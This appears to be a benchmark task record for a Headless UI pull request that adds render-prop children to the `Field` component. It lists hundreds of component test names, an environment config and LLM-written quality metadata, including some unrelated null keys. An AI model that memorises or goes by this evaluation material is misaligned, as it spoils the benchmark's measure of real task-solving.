using a template `as` prop", "should yell when we render a Menu using a template `as` prop (default) that contains multiple children (if we passthrough props)", "should be possible to render a MenuButton using a default render prop", "should be possible to render a MenuButton using a template `as` prop", "should be possible to render a MenuButton using a template `as` prop and a custom element", "should yell when we render a MenuButton using a template `as` prop that contains multiple children", "should be possible to render MenuItems using a default render prop", "should be possible to render MenuItems using a template `as` prop", "should yell when we render MenuItems using a template `as` prop that contains multiple children", "should be possible to always render the MenuItems if we provide it a `static` prop", "should be possible to use a different render strategy for the MenuItems", "should be possible to render MenuItem using a default render prop", "should be possible to render a MenuItem using a template `as` prop", "should yell when we render a MenuItem using a template `as` prop that contains multiple children", "should always open the MenuItems because of a wrapping OpenClosed component", "should always close the MenuItems because of a wrapping OpenClosed component", "should be possible to render a TransitionChild that inherits state from the Menu", "should not focus trap when we use Tab", "should not focus trap when we use Shift+Tab", "should error when we are using a <DialogOverlay /> without a parent <Dialog />", "should error when we are using a <DialogTitle /> without a parent <Dialog />", "should error when we are using a <DialogBackdrop /> without a parent <Dialog />", "should error when we are using a <DialogPanel /> without a parent <Dialog />", "should be possible to render a Dialog without crashing", "should be possible to access the ref on the DialogBackdrop", "should be possible to access the ref on the DialogPanel", "should complain when an `open` prop is missing", "should be able to explicitly choose role=dialog", "should be able to explicitly choose role=alertdialog", "should fall back to role=dialog for an invalid role", "should complain when an `open` prop is not a boolean", "should be possible to render a Dialog using a render prop", "should be possible to pass props to the Dialog itself", "should be possible to always render the Dialog if we provide it a `static` prop (and enable focus trapping based on `open`)", "should be possible to always render the Dialog if we provide it a `static` prop (and disable focus trapping based on `open`)", "should be possible to use a different render strategy for the Dialog", "should add a scroll lock to the html tag", "should wait to add a scroll lock to the html tag when unmount is false in a Transition", "scroll locking should work when transitioning between dialogs", "should remove the scroll lock when the open closed state is `Closing`", "should not have a scroll lock when the transition marked as not shown", "should be possible to render DialogOverlay using a render prop", "should throw an error if a DialogBackdrop is used without a DialogPanel", "should not throw an error if a DialogBackdrop is used with a DialogPanel", "should portal the DialogBackdrop", "should be possible to render DialogTitle using a render prop", "should be possible to render DialogDescription using a render prop", "should be possible to open a dialog from inside a Popover (and then close it)", "should be possible to open the Dialog via a Transition component", "should be possible to close the Dialog via a Transition component", "should be possible to close the dialog with Escape", "should be possible to close the dialog with Escape, when a field is focused", "should not be possible to close the dialog with Escape, when a field is focused but cancels the event", "should be possible to tab around when using the initialFocus ref", "should be possible to tab around when using the initialFocus ref on a component", "should not escape the FocusTrap when there is only 1 focusable element (going forwards)", "should not escape the FocusTrap when there is only 1 focusable element (going backwards)", "should be possible to close a Dialog using a click on the DialogOverlay", "should not close the Dialog when clicking on contents of the Dialog.Overlay", "should be possible to close the dialog, and re-focus the button when we click outside on the body element", "should be possible to close the dialog, and keep focus on the focusable element", "should stop propagating click events when clicking on the Dialog.Overlay", "should be possible to submit a form inside a Dialog", "should stop propagating click events when clicking on an element inside the Dialog", "should should be possible to click on removed elements without closing the Dialog", "should be possible to click on elements created by third party libraries", "should be possible to focus elements created by third party libraries", "should be possible to click elements inside the dialog when they reside inside a shadow boundary", "should close the Dialog if we click outside the DialogPanel", "should not close the Dialog if we click inside the DialogPanel", "should not close the dialog if opened during mouse up", "should not close the dialog if click starts inside the dialog but ends outside", "should be possible to open nested Dialog components and close them with `Escape`", "should be possible to open nested Dialog components and close them with `Outside Click`", "should be possible to open nested Dialog components and close them with `Click on Dialog.Overlay`", "should error when we are using a <Dialog.Overlay /> without a parent <Dialog />", "should error when we are using a <Dialog.Title /> without a parent <Dialog />", "should error when we are using a <Dialog.Backdrop /> without a parent <Dialog />", "should error when we are using a <Dialog.Panel /> without a parent <Dialog />", "should complain when the `open` and `onClose` prop are missing", "should complain when an `open` prop is provided without an `onClose` prop", "should complain when an `onClose` prop is provided without an `open` prop", "should complain when an `onClose` prop is not a function", "should be possible to render Dialog.Overlay using a render prop", "should throw an error if a Dialog.Backdrop is used without a Dialog.Panel", "should not throw an error if a Dialog.Backdrop is used with a Dialog.Panel", "should portal the Dialog.Backdrop", "should be possible to render Dialog.Title using a render prop", "should be possible to render Dialog.Description using a render prop", "should be possible to close a Dialog using a click on the Dialog.Overlay", "should not close the Dialog if it starts open and we click inside the Dialog when it has only a panel", "should close the Dialog if we click outside the Dialog.Panel", "should not close the Dialog if we click inside the Dialog.Panel", "should be possible to open nested Dialog components (visible when mounted) and close them with `Escape`", "should be possible to open nested Dialog components (visible when mounted) and close them with `Outside Click`", "should be possible to open nested Dialog components (visible when mounted) and close them with `Click on Dialog.Overlay`", "should be possible to open nested Dialog components (visible when always) and close them with `Escape`", "should be possible to open nested Dialog components (visible when always) and close them with `Outside Click`", "should error when we are using a <Popover.Button /> without a parent <Popover />", "should error when we are using a <Popover.Panel /> without a parent <Popover />", "should error when we are using a <Popover.Overlay /> without a parent <Popover />", "should be possible to render a Popover.Group with multiple Popover components", "should expose a close function that closes the popover and takes an event", "should be possible to get a ref to the Popover", "should be possible to use a Fragment with an optional ref", "should be possible to render a Popover.Button using a fragment", "should be possible to render a Popover.Button using a render prop", "should be possible to render a Popover.Button using a render prop and an `as` prop", "should be possible to render Popover.Panel using a render prop", "should be possible to always render the Popover.Panel if we provide it a `static` prop", "should be possible to use a different render strategy for the Popover.Panel", "should close the Popover, when Popover.Panel has the focus prop and you focus the open button", "should warn when you are using multiple `Popover.Button` components", "should warn when you are using multiple `Popover.Button` components (wrapped in a Transition)", "should not warn when you are using multiple `Popover.Button` components inside the `Popover.Panel`", "should not warn when you are using multiple `Popover.Button` components inside the `Popover.Panel` (wrapped in a Transition)", "should warn when you are using multiple `Popover.Button` components in a nested `Popover`", "should not warn when you are using multiple `Popover.Button` components in a nested `Popover.Panel`", "should be possible to wrap the Popover.Panel with a Transition component", "should close the Popover by pressing `Enter` on a Popover.Button inside a Popover.Panel", "should close the Popover menu, when pressing escape on the Popover.Button", "should close the Popover menu, when pressing escape on the Popover.Panel", "should be possible to close a sibling Popover when pressing escape on a sibling Popover.Button", "should be possible to Tab through the panel contents onto the next Popover.Button", "should be possible to place a focusable item in the Popover.Group, and keep the Popover open when we focus the focusable element", "should close the Popover menu once we Tab out of the Popover.Group", "should close the Popover when the Popover.Panel has a focus prop", "should close the Popover when the Popover.Panel has a focus prop (Popover.Panel uses a Portal)", "should close the Popover when the Popover.Panel has a focus prop (Popover.Panel uses a Portal), and focus the next focusable item in line", "should focus the previous Popover.Button when Shift+Tab on the second Popover.Button", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel (inside a Portal)", "should be possible to focus the last item in the Popover.Panel when pressing Shift+Tab on the next Popover.Button", "should be possible to focus the last item in the Popover.Panel when pressing Shift+Tab on the next Popover.Button (using Portal's)", "should close the Popover by pressing `Space` on a Popover.Button inside a Popover.Panel", "should close the Popover by pressing `Enter` on a Popover.Button and go to the href of the `a` inside a Popover.Panel", "should be possible to close a Popover using a click on the Popover.Overlay", "should be possible to close the Popover by clicking on a Popover.Button inside a Popover.Panel", "should not close the Popover when clicking on a focusable element inside a static Popover.Panel", "should not close the Popover when clicking on a non-focusable element inside a static Popover.Panel", "should close the Popover when clicking outside of a static Popover.Panel", "should error when we are using a <ListboxButton /> without a parent <Listbox />", "should error when we are using a <ListboxLabel /> without a parent <Listbox />", "should error when we are using a <ListboxOptions /> without a parent <Listbox />", "should error when we are using a <ListboxOption /> without a parent <Listbox />", "should be possible to render a Listbox without crashing", "should be possible to render a Listbox using a render prop", "should be possible to disable a Listbox", "should not crash in multiple mode", "null should be a valid value for the Listbox", "should be possible to use the by prop (as a string) with a null initial value", "should be possible to use the by prop (as a string) with a null listbox option", "should be possible to use completely new objects while rendering (single mode)", "should be possible to use completely new objects while rendering (multiple mode)", "should be possible to render a ListboxLabel using a render prop", "should be possible to render a ListboxLabel using a render prop and an `as` prop", "should be possible to render a ListboxButton using a render prop", "should be possible to render a ListboxButton using a render prop and an `as` prop", "should be possible to render a ListboxButton and a ListboxLabel and see them linked together", "should be possible to render ListboxOptions using a render prop", "should be possible to always render the ListboxOptions if we provide it a `static` prop", "should be possible to use a different render strategy for the ListboxOptions", "should be possible to render a ListboxOption using a render prop", "should expose the value via the render prop", "should be possible to reset to the default value in multiple mode", "should be possible to swap the Listbox option with a button for example", "should always open the ListboxOptions because of a wrapping OpenClosed component", "should always close the ListboxOptions because of a wrapping OpenClosed component", "should be possible to open the listbox with Enter", "should not be possible to open the listbox with Enter when the button is disabled", "should be possible to open the listbox with Enter, and focus the selected option", "should be possible to open the listbox with Enter, and focus the selected option (when using the `hidden` render strategy)", "should be possible to open the listbox with Enter, and focus the selected option (with a list of objects)", "should have no active listbox option when there are no listbox options at all", "should focus the first non disabled listbox option when opening with Enter", "should focus the first non disabled listbox option when opening with Enter (jump over multiple disabled ones)", "should have no active listbox option upon Enter key press, when there are no non-disabled listbox options", "should be possible to close the listbox with Enter when there is no active listboxoption", "should be possible to close the listbox with Enter and choose the active listbox option", "should be possible to open the listbox with Space", "should not be possible to open the listbox with Space when the button is disabled", "should be possible to open the listbox with Space, and focus the selected option", "should focus the first non disabled listbox option when opening with Space", "should focus the first non disabled listbox option when opening with Space (jump over multiple disabled ones)", "should have no active listbox option upon Space key press, when there are no non-disabled listbox options", "should be possible to close the listbox with Space and choose the active listbox option", "should be possible to close an open listbox with Escape", "should focus trap when we use Tab", "should be possible to open the listbox with ArrowDown", "should not be possible to open the listbox with ArrowDown when the button is disabled", "should be possible to open the listbox with ArrowDown, and focus the selected option", "should be possible to use ArrowDown to navigate the listbox options", "should be possible to use ArrowDown to navigate the listbox options and skip the first disabled one", "should be possible to use ArrowDown to navigate the listbox options and jump to the first non-disabled one", "should be possible to use ArrowRight to navigate the listbox options", "should be possible to open the listbox with ArrowUp and the last option should be active", "should not be possible to open the listbox with ArrowUp and the last option should be active when the button is disabled", "should be possible to open the listbox with ArrowUp, and focus the selected option", "should be possible to use ArrowUp to navigate the listbox options and jump to the first non-disabled one", "should not be possible to navigate up or down if there is only a single non-disabled option", "should be possible to use ArrowUp to navigate the listbox options", "should be possible to use ArrowLeft to navigate the listbox options", "should be possible to use the End key to go to the last listbox option", "should be possible to use the End key to go to the last non disabled listbox option", "should be possible to use the End key to go to the first listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon End key press, when there are no non-disabled listbox options", "should be possible to use the PageDown key to go to the last listbox option", "should be possible to use the PageDown key to go to the last non disabled listbox option", "should be possible to use the PageDown key to go to the first listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon PageDown key press, when there are no non-disabled listbox options", "should be possible to use the Home key to go to the first listbox option", "should be possible to use the Home key to go to the first non disabled listbox option", "should be possible to use the Home key to go to the last listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon Home key press, when there are no non-disabled listbox options", "should be possible to use the PageUp key to go to the first listbox option", "should be possible to use the PageUp key to go to the first non disabled listbox option", "should be possible to use the PageUp key to go to the last listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon PageUp key press, when there are no non-disabled listbox options", "should not be possible to search for a disabled option", "should focus the ListboxButton when we click the ListboxLabel", "should not focus the ListboxButton when we right click the ListboxLabel", "should be possible to open the listbox on click", "should not be possible to open the listbox on right click", "should not be possible to open the listbox on click when the button is disabled", "should be possible to open the listbox on click, and focus the selected option", "should be possible to close a listbox on click", "should be a no-op when we click outside of a closed listbox", "should be possible to click outside of the listbox which should close the listbox", "should be possible to click outside of the listbox on another listbox button which should close the current listbox and open the new listbox", "should be possible to click outside of the listbox which should close the listbox (even if we press the listbox button)", "should be possible to hover an option and make it active", "should make a listbox option active when you move the mouse over it", "should be a no-op when we move the mouse and the listbox option is already active", "should be a no-op when we move the mouse and the listbox option is disabled", "should not be possible to hover an option that is disabled", "should be possible to mouse leave an option and make it inactive", "should be possible to mouse leave a disabled option and be a no-op", "should be possible to click a listbox option, which closes the listbox", "should be possible to click a disabled listbox option, which is a no-op", "should be possible focus a listbox option, so that it becomes active", "should not be possible to focus a listbox option which is disabled", "should be possible to pass multiple values to the Listbox component", "should make the first selected option the active item", "should keep the listbox open when selecting an item via the keyboard", "should toggle the selected state of an option when clicking on it", "should toggle the selected state of an option when clicking on it (using objects instead of primitives)", "should trigger the `change` when the tab changes", "should error when we are using a <TabList /> without a parent <TabGroup /> component", "should error when we are using a <Tab /> without a parent <TabGroup /> component", "should error when we are using a <TabPanels /> without a parent <TabGroup /> component", "should error when we are using a <TabPanel /> without a parent <TabGroup /> component", "should be possible to render TabGroup without crashing", "should be possible to render the TabPanels first, then the TabList", "should guarantee the order when injecting new tabs dynamically", "should guarantee the order of DOM nodes when reversing the tabs and panels themselves, then performing actions (controlled component)", "should guarantee the order of DOM nodes when reversing the tabs and panels themselves, then performing actions (uncontrolled component)", "should expose the `selectedIndex` on the `Tabs` component", "should expose the `selectedIndex` on the `TabList` component", "should expose the `selectedIndex` on the `TabPanels` component", "should expose the `selected` state on the `Tab` components", "should expose the `selected` state on the `TabPanel` components", "should jump to the nearest tab when the defaultIndex is out of bounds (-2)", "should jump to the nearest tab when the defaultIndex is out of bounds (+5)", "should jump to the next available tab when the defaultIndex is a disabled tab", "should jump to the next available tab when the defaultIndex is a disabled tab and wrap around", "should not change the Tab if the defaultIndex changes", "should select first tab if no tabs were provided originally", "should select first tab if no tabs were provided originally (with a defaultIndex of 1)", "should not change the tab in a controlled component if you do not respond to the @change", "should be possible to change active tab controlled and uncontrolled", "should jump to the nearest tab when the selectedIndex is out of bounds (-2)", "should jump to the nearest tab when the selectedIndex is out of bounds (+5)", "should jump to the next available tab when the selectedIndex is a disabled tab", "should jump to the next available tab when the selectedIndex is a disabled tab and wrap around", "should prefer selectedIndex over defaultIndex", "should wrap around when overflowing the index when using a controlled component", "should wrap around when underflowing the index when using a controlled component", "should be possible to tab to the default initial first tab", "should be possible to tab to the default index tab", "should be possible to go to the next item (activation = `auto`)", "should be possible to go to the next item (activation = `manual`)", "should wrap around at the end (activation = `auto`)", "should wrap around at the end (activation = `manual`)", "should not be possible to go right when in vertical mode (activation = `auto`)", "should not be possible to go right when in vertical mode (activation = `manual`)", "should be possible to go to the previous item (activation = `auto`)", "should be possible to go to the previous item (activation = `manual`)", "should wrap around at the beginning (activation = `auto`)", "should wrap around at the beginning (activation = `manual`)", "should not be possible to go left when in vertical mode (activation = `auto`)", "should not be possible to go left when in vertical mode (activation = `manual`)", "should not be possible to go down when in horizontal mode (activation = `auto`)", "should not be possible to go down when in horizontal mode (activation = `manual`)", "should be possible to go to the first focusable item (activation = `auto`)", "should be possible to go to the first focusable item (activation = `manual`)", "should be possible to activate the focused tab", "should be possible to click on a tab to focus it", "should be a no-op when clicking on a disabled tab", "should be possible to go to the next item containing a Dialog component", "should trigger the `onChange` when the tab changes", "should error when we are using a <Tab.List /> without a parent <Tab.Group /> component", "should error when we are using a <Tab /> without a parent <Tab.Group /> component", "should error when we are using a <Tab.Panels /> without a parent <Tab.Group /> component", "should error when we are using a <Tab.Panel /> without a parent <Tab.Group /> component", "should be possible to render Tab.Group without crashing", "should be possible to render the Tab.Panels first, then the Tab.List", "should be possible to render using as={Fragment}", "should be possible to render using multiple as={Fragment}", "should expose the `selectedIndex` on the `Tab.Group` component", "should expose the `selectedIndex` on the `Tab.List` component", "should expose the `selectedIndex` on the `Tab.Panels` component", "should expose the `selected` state on the `Tab.Panel` components", "should not change the tab in a controlled component if you do not respond to the onChange", "should not steal the ref from the child", "should render without crashing", "should be possible to render a Transition without children", "should yell at us when we forget the required show prop", "should render a div and its children by default", "should passthrough all the props (that we do not use internally)", "should render another component if the `as` prop is used and its children by default", "should passthrough all the props (that we do not use internally) even when using an `as` prop", "should render nothing when the show prop is false", "should be possible to change the underlying DOM tag", "should be possible to use a render prop", "should yell at us when we forget to forward the ref when using a render prop", "should yell at us when we forget to wrap the `<Transition.Child />` in a parent <Transition /> component", "should be possible to render a Transition.Child without children", "should be possible to use a Transition.Root and a Transition.Child", "should be possible to nest transition components", "should be possible to change the underlying DOM tag of the Transition.Child components", "should be possible to change the underlying DOM tag of the Transition component and Transition.Child components", "should be possible to use render props on the Transition.Child components", "should be possible to use render props on the Transition and Transition.Child components", "should yell at us when we forgot to forward the ref on one of the Transition.Child components", "should yell at us when we forgot to forward a ref on the Transition component", "should support new lines in class lists", "should be possible to passthrough the transition classes", "should be possible to passthrough the transition classes and immediately apply the enter transitions when appear is set to true", "should fire events in the correct order", "should fire only one event for a given component change", "should error when we are using a <Listbox.Button /> without a parent <Listbox />", "should error when we are using a <Listbox.Label /> without a parent <Listbox />", "should error when we are using a <Listbox.Options /> without a parent <Listbox />", "should error when we are using a <Listbox.Option /> without a parent <Listbox />", "should be possible to render a Listbox.Label using a render prop", "should be possible to render a Listbox.Label using a render prop and an `as` prop", "should be possible to render a Listbox.Button using a render prop", "should be possible to render a Listbox.Button using a render prop and an `as` prop", "should be possible to render a Listbox.Button and a Listbox.Label and see them linked together", "should be possible to render Listbox.Options using a render prop", "should be possible to always render the Listbox.Options if we provide it a `static` prop", "should be possible to use a different render strategy for the Listbox.Options", "should be possible to render a Listbox.Option using a render prop", "should be possible to wrap the Listbox.Options with a Transition component", "should focus the Listbox.Button when we click the Listbox.Label", "should not focus the Listbox.Button when we right click the Listbox.Label", "should be possible to click outside of the listbox, on an element which is within a focusable element, which closes the listbox", "should yell at us when we forget to wrap the `<TransitionChild />` in a parent <Transition /> component", "should be possible to render a TransitionChild without children", "should be possible to change the underlying DOM tag of the TransitionChild components", "should be possible to change the underlying DOM tag of the Transition component and TransitionChild components", "should be possible to use render props on the TransitionChild components", "should be possible to use render props on the Transition and TransitionChild components", "should yell at us when we forgot to forward the ref on one of the TransitionChild components", "should transition in completely (duration defined in milliseconds)", "should transition in completely (duration defined in seconds)", "should transition in completely", "should transition out completely", "should transition out completely (render strategy = hidden)", "should not unmount the whole tree when some children are still transitioning", "should fire events for all the stages", "should error when we are using a <ComboboxButton /> without a parent <Combobox />", "should error when we are using a <ComboboxLabel /> without a parent <Combobox />", "should error when we are using a <ComboboxOptions /> without a parent <Combobox />", "should error when we are using a <ComboboxOption /> without a parent <Combobox />", "should be possible to render a Combobox without crashing", "should guarantee the order of options based on `order` when performing actions", "should be possible to render a Combobox using a render prop", "should be possible to disable a Combobox", "should not crash when a defaultValue is not given", "should close the Combobox when the input is blurred", "selecting an option puts the value into Combobox.Input when displayValue is not provided", "selecting an option puts the display value into Combobox.Input when displayValue is provided", "selecting an option puts the display value into Combobox.Input when displayValue is provided (when v-model is undefined)", "conditionally rendering the input should allow changing the display value", "should be possible to override the `type` on the input", "should move the caret to the end of the input when syncing the value", "should be possible to render a ComboboxLabel using a render prop", "should be possible to link Input/Button and Label if Label is rendered last", "should be possible to render a ComboboxLabel using a render prop and an `as` prop", "should be possible to render a ComboboxButton using a render prop", "should be possible to render a ComboboxButton using a render prop and an `as` prop", "should be possible to render a ComboboxButton and a ComboboxLabel and see them linked together", "should be possible to render ComboboxOptions using a render prop", "should be possible to always render the ComboboxOptions if we provide it a `static` prop", "should be possible to use a different render strategy for the ComboboxOptions", "should be possible to render a ComboboxOption using a render prop", "should be possible to swap the Combobox option with a button for example", "should mark all the elements between Combobox.Options and Combobox.Option with role none", "should always open the ComboboxOptions because of a wrapping OpenClosed component", "should always close the ComboboxOptions because of a wrapping OpenClosed component", "should sync the active index properly", "should be possible to open the Combobox with Enter", "should not be possible to open the combobox with Enter when the button is disabled", "should be possible to open the combobox with Enter, and focus the selected option", "should be possible to open the combobox with Enter, and focus the selected option (when using the `hidden` render strategy)", "should be possible to open the combobox with Enter, and focus the selected option (with a list of objects)", "should have no active combobox option when there are no combobox options at all", "should be possible to open the combobox with Space", "should not be possible to open the combobox with Space when the button is disabled", "should be possible to open the combobox with Space, and focus the selected option", "should have no active combobox option upon Space key press, when there are no non-disabled combobox options", "should be possible to close an open combobox with Escape", "should not propagate the Escape event when the combobox is open", "should propagate the Escape event when the combobox is closed", "should be possible to open the combobox with ArrowDown", "should not be possible to open the combobox with ArrowDown when the button is disabled", "should be possible to open the combobox with ArrowDown, and focus the selected option", "should be possible to open the combobox with ArrowUp and the last option should be active", "should not be possible to open the combobox with ArrowUp and the last option should be active when the button is disabled", "should be possible to open the combobox with ArrowUp, and focus the selected option", "should be possible to use ArrowUp to navigate the combobox options and jump to the first non-disabled one", "should be possible to close the combobox with Enter and choose the active combobox option", "pressing Tab should select the active item and move to the next DOM node", "pressing Shift+Tab should select the active item and move to the previous DOM node", "should bubble escape when using `static` on Combobox.Options", "should bubble escape when not using Combobox.Options at all", "should sync the input field correctly and reset it when pressing Escape", "should be possible to use ArrowDown to navigate the combobox options", "should be possible to use ArrowDown to navigate the combobox options and skip the first disabled one", "should be possible to use ArrowDown to navigate the combobox options and jump to the first non-disabled one", "should be possible to go to the next item if no value is set", "should be possible to use ArrowUp to navigate the combobox options", "should be possible to use the End key to go to the last combobox option", "should be possible to use the End key to go to the last non disabled combobox option", "should be possible to use the End key to go to the first combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon End key press, when there are no non-disabled combobox options", "should be possible to use the PageDown key to go to the last combobox option", "should be possible to use the PageDown key to go to the last non disabled Combobox option", "should be possible to use the PageDown key to go to the first combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon PageDown key press, when there are no non-disabled combobox options", "should be possible to use the Home key to go to the first combobox option", "should be possible to use the Home key to go to the first non disabled combobox option", "should be possible to use the Home key to go to the last combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon Home key press, when there are no non-disabled combobox options", "should be possible to use the PageUp key to go to the first combobox option", "should be possible to use the PageUp key to go to the first non disabled combobox option", "should be possible to use the PageUp key to go to the last combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon PageUp key press, when there are no non-disabled combobox options", "should reset the value when the last character is removed, when in `nullable` mode", "should not be possible to search and activate a disabled option", "should maintain activeIndex and activeOption when filtering", "should focus the ComboboxButton when we click the ComboboxLabel", "should not focus the ComboboxInput when we right click the ComboboxLabel", "should be possible to open the combobox by focusing the input with immediate mode enabled", "should not be possible to open the combobox by focusing the input with immediate mode disabled", "should not be possible to open the combobox by focusing the input with immediate mode enabled when button is disabled", "should be possible to close a combobox on click with immediate mode enabled", "should be possible to close a focused combobox on click with immediate mode enabled", "should be possible to open the combobox on click", "should not be possible to open the combobox on right click", "should not be possible to open the combobox on click when the button is disabled", "should be possible to open the combobox on click, and focus the selected option", "should be possible to close a combobox on click", "should be a no-op when we click outside of a closed combobox", "should be possible to click outside of the combobox on another combobox button which should close the current combobox and open the new combobox", "should be possible to click outside of the combobox which should close the combobox (even if we press the combobox button)", "should be possible to click outside of the combobox, on an element which is within a focusable element, which closes the combobox", "should be possible to hover an option and make it active when using `static`", "should make a combobox option active when you move the mouse over it", "should be a no-op when we move the mouse and the combobox option is already active", "should be a no-op when we move the mouse and the combobox option is disabled", "should be possible to click a combobox option, which closes the combobox", "should be possible to click a combobox option, which closes the combobox with immediate mode enabled", "should be possible to click a disabled combobox option, which is a no-op", "should be possible focus a combobox option, so that it becomes active", "should not be possible to focus a combobox option which is disabled", "should be possible to hold the last active option", "should sync the input field correctly and reset it when resetting the value from outside (to null)", "should sync the input field correctly and reset it when resetting the value from outside (to undefined)", "should sync the input field correctly and reset it when resetting the value from outside (when using displayValue)", "should be possible to pass multiple values to the Combobox component", "should keep the combobox open when selecting an item via the keyboard", "should reset the active option, if the active option gets unmounted", "should error when we are using a <Combobox.Button /> without a parent <Combobox />", "should error when we are using a <Combobox.Label /> without a parent <Combobox />", "should error when we are using a <Combobox.Options /> without a parent <Combobox />", "should error when we are using a <Combobox.Option /> without a parent <Combobox />", "selecting an option puts the display value into Combobox.Input when displayValue is provided (when value is undefined)", "should be possible to render a Combobox.Label using a render prop", "should be possible to render a Combobox.Label using a render prop and an `as` prop", "should be possible to render a Combobox.Button using a render prop", "should be possible to render a Combobox.Button using a render prop and an `as` prop", "should be possible to render a Combobox.Button and a Combobox.Label and see them linked together", "should be possible to render Combobox.Options using a render prop", "should be possible to always render the Combobox.Options if we provide it a `static` prop", "should be possible to use a different render strategy for the Combobox.Options", "should be possible to render a Combobox.Option using a render prop", "should be possible to wrap the Combobox.Options with a Transition component", "should be possible to open the combobox with Enter", "should be possible to use the PageDown key to go to the last non disabled combobox option", "should focus the Combobox.Input when we click the Combobox.Label", "should not focus the Combobox.Input when we right click the Combobox.Label", "should warn when changing the combobox from uncontrolled to controlled", "should warn when changing the combobox from controlled to uncontrolled" ]
Function: Field(props: { disabled?: boolean, children?: React.ReactNode | ((slot: { disabled: boolean }) => React.ReactNode) }) Location: packages/@headlessui-react/src/components/field/field.tsx Inputs: - **disabled** (optional boolean): controls the disabled state of the field. - **children** (ReactNode | function): either static JSX or a render‑prop function that receives a **slot** object `{ disabled: boolean }`. Outputs: Renders the field’s children (or the result of invoking the render‑prop) wrapped in `<FormFieldsProvider>`, propagating the current `disabled` flag via the slot parameter. When a render‑prop is used, the function is called with `{ disabled }` reflecting the field’s disabled state. Description: The `<Field>` component now supports a render‑prop children signature, allowing callers to customize rendering based on the field’s disabled state (e.g., `<Field>{({ disabled }) => <input disabled={disabled} />}</Field>`).
MIT
{ "base_image_name": "node_20", "install": [ "npm ci --prefer-offline --no-audit --progress=false" ], "log_parser": "parse_log_js_4", "test_cmd": "npm test -- --verbose --no-colors" }
{ "num_modified_files": 2, "num_modified_lines": 8, "pr_author": "RobinMalfait", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests that the Field component accept a render‑prop children function and expose the disabled slot. The added test verifies exactly this behavior, and the golden patch implements the necessary conditional handling of function children. The specification is complete, the test matches the requirement, and there are no signs of test‑suite coupling, implicit naming, external dependencies, ambiguous specs, unrelated patch artifacts, or hidden domain knowledge.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
da94b80860703d3c25c17631eaf84435821e7088
2024-02-03 16:18:36
vercel[bot]: [vc]: #62L27VL5fhxoxrpYowr4T76pFVp3yVeONxx5DJmVItA=:eyJpc01vbm9yZXBvIjp0cnVlLCJ0eXBlIjoiZ2l0aHViIiwicHJvamVjdHMiOlt7Im5hbWUiOiJoZWFkbGVzc3VpLXZ1ZSIsInJvb3REaXJlY3RvcnkiOiJwbGF5Z3JvdW5kcy92dWUiLCJpbnNwZWN0b3JVcmwiOiJodHRwczovL3ZlcmNlbC5jb20vdGFpbHdpbmRsYWJzL2hlYWRsZXNzdWktdnVlL0cyemZ0TjdnN0Q1c3RQTHppU2tmTlFTaFg2QUwiLCJwcmV2aWV3VXJsIjoiaGVhZGxlc3N1aS12dWUtZ2l0LWZpeC1pc3N1ZS0yOTE1LXRhaWx3aW5kbGFicy52ZXJjZWwuYXBwIiwibmV4dENvbW1pdFN0YXR1cyI6IlBFTkRJTkciLCJsaXZlRmVlZGJhY2siOnsicmVzb2x2ZWQiOjAsInVucmVzb2x2ZWQiOjAsInRvdGFsIjowLCJsaW5rIjoiaGVhZGxlc3N1aS12dWUtZ2l0LWZpeC1pc3N1ZS0yOTE1LXRhaWx3aW5kbGFicy52ZXJjZWwuYXBwIn19XX0= **The latest updates on your projects**. Learn more about [Vercel for Git ↗︎](https://vercel.link/github-learn-more) | Name | Status | Preview | Comments | Updated (UTC) | | :--- | :----- | :------ | :------- | :------ | | **headlessui-vue** | 🔄 Building ([Inspect](https://vercel.com/tailwindlabs/headlessui-vue/G2zftN7g7D5stPLziSkfNQShX6AL)) | [Visit Preview](https://vercel.live/open-feedback/headlessui-vue-git-fix-issue-2915-tailwindlabs.vercel.app?via=pr-comment-visit-preview-link&passThrough=1) | 💬 [**Add feedback**](https://vercel.live/open-feedback/headlessui-vue-git-fix-issue-2915-tailwindlabs.vercel.app?via=pr-comment-feedback-link) | Feb 3, 2024 4:18pm |
tailwindlabs__headlessui-2966
